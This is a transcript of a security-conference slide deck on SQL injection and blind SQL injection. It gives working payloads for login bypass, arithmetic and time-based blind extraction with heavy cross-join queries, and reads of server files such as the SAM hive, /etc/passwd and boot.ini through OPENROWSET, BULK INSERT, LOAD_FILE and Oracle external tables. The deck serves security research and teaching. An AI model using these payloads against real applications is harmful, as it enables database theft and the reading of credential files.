Playing With (B)Sqli
-
Upload
chema-alonso -
Category
Technology
-
view
3.985 -
download
1
description
Transcript of Playing With (B)Sqli
(Re) Playing with (Blind) SQL Injection
Chema Alonso Informatica64
Microsoft MVP Enterprise Security
SQL Injection attacks
http://www.phrack.org/issues.html?id=8&issue=54
A long time ago, in a galaxy far, far away…
Back on the 90sSelect id from users_tablewhere login=‘$users’ and passw=‘$password’;
User
Password ****************
Back on the 90sSelect id from users_tablewhere login=‘Admin’ and passw=‘’ or ‘1’=‘1’;
User
Password
Admin
‘ or ‘1’=‘1
Not everybody….
ODBC Error messages
• Username: ' having 1=1-- • [Microsoft][ODBC SQL Server Driver][SQL Server]Column
'users.id' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.
• Username: ' group by users.id having 1=1--• [Microsoft][ODBC SQL Server Driver][SQL Server]Column
'users.username' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
• And so on…
Even security companies: Kaspersky
Agenda• Serialized SQL Injection
– Demo: XML Extractor• Arithmetic SQL Injection
– Divide by Zero– Sums and subtractions– Type oveflow– Demo
• Remote File Downloading using Blind SQL Injection– SQL Sever – MySQL– Oracle– Demo: RFD Tool
• Time-Based Blind SQL Injection using heavy queries– Demo: Marathon Tool
Serialized SQL Injection
Serialized SQL Injection
• Goal: To Merge complex resultsets in a single showable field
• XML serialization functions allow to convert a resultset into a one XML string.
• It´s possible to download big amount of data with single and simple injections.
SQL Server• FOR XML: Retrieves data as a single string representing an XML tree.
• RAW: Mandatory option. Shows the information converting each row of the result set in an XML element in the form <row />.
• BINARY BASE64: The query will fail if we find any BINARY data type column (containing images, or passwords) if this option is not explicitly specified.
– union select '1','2','3',(select * from sysusers for xml raw, binary base64)
• XMLSCHEMA: obtains the whole table structure, including the data types, column names and other constraints.
– Described by Dani Kachakil
MySQL
• No default XML support, requires a server side extension
• GROUP_CONCAT (v 4.1+)
Oracle• xmlforest, xmlelement,…• No * support
Demo: Serialized SQL Injection
Arithmetic Blind SQL Injection
Blind Attacks
• Attacker injects code but can´t access directly to the data.
• However this injection changes the behavior of the web application.
• Then the attacker looks for differences between true code injections (1=1) and false code injections (1=2) in the response pages to extract data.– Blind SQL Injection– Biind Xpath Injection– Blind LDAP Injection
Blind SQL Injection Attacks
• Attacker injects:– “True where clauses”– “False where clauses“– Ex:
• Program.php?id=1 and 1=1• Program.php?id=1 and 1=2
• Program doesn’t return any visible data from database or data in error messages.
• The attacker can´t see any data extracted from the database.
Blind SQL Injection Attacks
• Attacker analyzes the response pages looking for differences between “True-Answer Page” and “False-Answer Page”:– Different hashes– Different html structure– Different patterns (keywords)– Different linear ASCII sums– “Different behavior”• By example: Response Time
Blind SQL Injection Attacks
• If any difference exists, then:– Attacker can extract all information from database– How? Using “booleanization”
• MySQL:– Program.php?id=1 and 100>(ASCII(Substring(user(),1,1)))
» “True-Answer Page” or “False-Answer Page”?
• MSSQL:– Program.php?id=1 and 100>(Select top 1
ASCII(Substring(name,1,1))) from sysusers)
• Oracle:– Program.php?id=1 and 100>(Select ASCII(Substr(username,1,1)))
from all_users where rownum<=1)
Blind SQL Injection
Arithmetic Blind SQL Injection
• The query forces the parameter to be numeric – SELECT field FROM table WHERE id=abs(param)
• Ex:Get Param(ID)Select ….. Where att1=abs(ID)Select ….. Where att2=k1-IDPrint response
• Boolean logic needs to be created with math operations
Arithmetic Blind SQL Injection
• Divide by zero (David Litchfield)– Id=A+(1/(ASCII(B)-C))•A-> Param value originally used in the query.•B -> Value we are searching for, e.g.: Substring(passwd,1,1)•C-> Counter [0..255]
– When ASCII(B)=C, the DB will generate a divide by zero exception.
Arithmetic Blind SQL Injection• Sums and subtractions– Id=A+ASCII(B)-C•A-> Param value originally used in the query.•B -> Value we are searching for, e.g.: Substring(passwd,1,1)•C-> Counter [0..255]
– When ASCII(B)=C, then the response page of id=A+ASCII(B)-C will be the same as id=A
Arithmetic Blind SQL Injection
• Value type overflow– Id=A+((C/ASCII(B))*(K))•A-> Param value originally used in the query.•B -> Value we are searching for, e.g.: Substring(passwd,1,1)•C-> Counter [0..255]•K-> Value that overflows the type defined for A
–(e.g. if A is integer, then K=2^32)
– When C/ASCII(B)==1, K*1 overflows the data type
Demo:
• Divide by zero• Sums and subtractions• Integer overflow
Remote File Downloading using Blind SQL Injection techniques
Accessing Files
• Two ways:– Load the file in a temp table• and i>(select top 1 ASCII(Substring(column)(file,pos,1))
from temp_table ??
– Load the file in the query• With every query the file is loaded in memory• I am very sorry, engine • and i>ASCII(Substring(load_file(file,pos,1))??
SQL Server 2K - External Data Sources• Only for known filetypes:
– Access trough Drivers: Txt, csv, xls, mdb, log– And 200>ASCII (SUBSTRING(SELECT * FROM OPENROWSET('MSDASQL', 'Driver
= {Microsoft Text Driver (*.txt; *.csv)};DefaultDir=C:\;','select top 1 * from c:\dir\target.txt’),1,1))
• Privileges– HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSSQLServer\Providers\
DisallowAdhocAccess=0– By default this key doesn´t exist so only users with Server Admin Role can use
these functions.• NTFS permissions
SQL Server 2K – Bulk option • Access to any file
– ; Create Table TempTable as (row varchar(8000)) -- – ; Bulk Insert TempTable From 'c:\file.ext' With (FIELDTERMINATOR = '\n',
ROWTERMINATOR = '\n‘) -- – ; alter table TempTable add num int IDENTITY(1,1) NOT NULL –– and (select COUNT(row) from TempTable)– and (select top 1 len(row) from TempTable where num = rownum) – and (select top 1 ASCII(SUBSTRING(row,1,1)) from TempTable where num = 1) – ; Drop Table TempTable--
• Privileges needed – Server Role: Bulkadmin– Database Role: db_owner o db_ddladmin
• NTFS permissions
SQL Server 2k5 – 2k8
• OPENDATASOURCE and OPENROWSET supported• Bulk options improved– AND 256 > ASCII(SUBSTRING ((SELECT * FROM
OPENROWSET(BULK 'c:\windows\repair\sam', SINGLE_BLOB) As Data), 1, 1))—
• Permisions• Bulkadmin Server Role• External Data Sources enabled
• Sp_configure• Surface configuration Tool for features
MySQL• LoadFile
– SELECT LOAD_FILE(‘/etc/passwd’)• SQLbfTools: MySQLget command (illo and dab)• http://www.reversing.org/node/view/11
• Load Data infile– ; Create table C8DFC643 (datos varchar(4000))– ; Load data infile 'c:\\boot.ini' into table C8DFC643– ; alter table C8DFC643 add column num integer auto_increment
unique key– and (select count(num) from C8DFC643)– and (select length(datos) from C8DFC643 where num = 1)– and (select ASCII(substring(datos,5,1)) from C8DFC643 where num = 1)– ; Drop table C8DFC643
Oracle – Plain Text files
• External Tables– ; execute immediate 'Create Directory A4A9308C
As ''c:\'' '; end; --– ; execute immediate 'Create table A737D141
( datos varchar2(4000) ) organization external (TYPE ORACLE_LOADER default directory A4A9308C access parameters ( records delimited by newline ) location (''boot.ini''))'; end;--
– Only Plain Text files
Oracle – DBMS_LOB; execute immediate ‘DECLARE l_bfile BFILE;l_blob BLOB;BEGIN INSERT INTO A737D141 (datos) VALUES (EMPTY_BLOB()) RETURN datos
INTO l_blob;l_bfile := BFILENAME(''A4A9308C'', ''Picture.bmp'');DBMS_LOB.fileopen(l_bfile, Dbms_Lob.File_Readonly);DBMS_LOB.loadfromfile(l_blob,l_bfile,DBMS_LOB.getlength(l_bfile));DBMS_LOB.fileclose(l_bfile);COMMIT;EXCEPTION
WHEN OTHERS THEN ROLLBACK;END;‘; end; --
Demo RFD
Time-based Blind SQL Injection using heavy queries
Time-Based Blind SQL Injection• In scenarios with no differences between “True-
Answer Page” and “False-Answer Page”, time delays can be used.
• Injection forces a delay in the response page when the condition injected is True. - Delay functions:
• SQL Server: waitfor • Oracle: dbms_lock.sleep• MySQL: sleep or Benchmark Function• Postgres: pg_sleep
– Ex:• ; if (exists(select * from users)) waitfor delay '0:0:5’
Exploit for Solar Empire Web Game
Time-Based Blind SQL Injection
• What about databases engines without delay functions, i.e., MS Access, Oracle connection without PL/SQL support, DB2, etc…?
• Can we still perform an exploitation of Time-Based Blind SQL Injection Attacks?
Yes, we can!
“Where-Clause” execution order
Select “whatever “From whateverWhere condition1 and condition2
- Condition1 lasts 10 seconds- Condition2 lasts 100 seconds
Which condition should be executed first?
The heavy condition first
Condition2 (100 sec) Condition1 (10 sec) Condition2 & condition1 Response Time
TRUE FALSE FALSE 110 sec
TRUE TRUE TRUE 110 sec
FALSE Not evaluated FALSE 100 sec
The light condition first
Condition1 (10 sec) Condition2 (100 sec) Condition1 & condition2 Response Time
TRUE FALSE FALSE 110 sec
TRUE TRUE TRUE 110 sec
FALSE Not evaluated FALSE 10 sec
Time-Based Blind SQL Injectionusing Heavy Queries
• Attacker could inject a heavy Cross-Join condition for delaying the response page in True-Injections.
• The Cross-join injection must be heavier than the other condition.
• Attacker only have to know or to guess the name of a table with select permission in the database.
• Example in MSSQL:– Program.php?id=1 and (SELECT count(*) FROM sysusers AS sys1,
sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7, sysusers AS sys8)>1 and 300>(select top 1 ascii(substring(name,1,1)) from sysusers)
“Default” tables to construct a heavy query
– Microsoft SQL Server• sysusers
– Oracle• all_users
– MySQL (versión 5)• information_schema.columns
– Microsoft Access• MSysAccessObjects (97 & 2000 versions)• MSysAccessStorage (2003 & 2007)
45
“Default” tables to construct a heavy query
• …or whatever you can guess– Clients– Customers– News– Logins– Users– Providers– ….Use your imagination…
Ex 1: MS SQL Server
Query takes 14 seconds -> True-Answer
Ex 1: MS SQL Server
• Query takes 1 second -> False-Answer
Ex 2: Oracle
Query Takes 22 seconds –> True-Answer
Ex 2: Oracle
Query Takes 1 second –> False-Answer
Ex 3: Access 2007
Query Takes 39 seconds –> True-Answer
Ex 3: Access 2007
Query Takes 1 second –> False-Answer
Marathon Tool
• Automates Time-Based Blind SQL Injection Attacks using Heavy Queries in SQL Server, MySQL, MS Access and Oracle Databases.
• Schema Extraction from known databases• Extract data using heavy queries not matter in
which database engine (without schema)• Developed in .NET• Source code available• http://www.codeplex.com/marathontool
Demo: Marathon Tool
Prevention:
Don´t forget Bobby Tables!
SANITIZE YOUR QUERIES!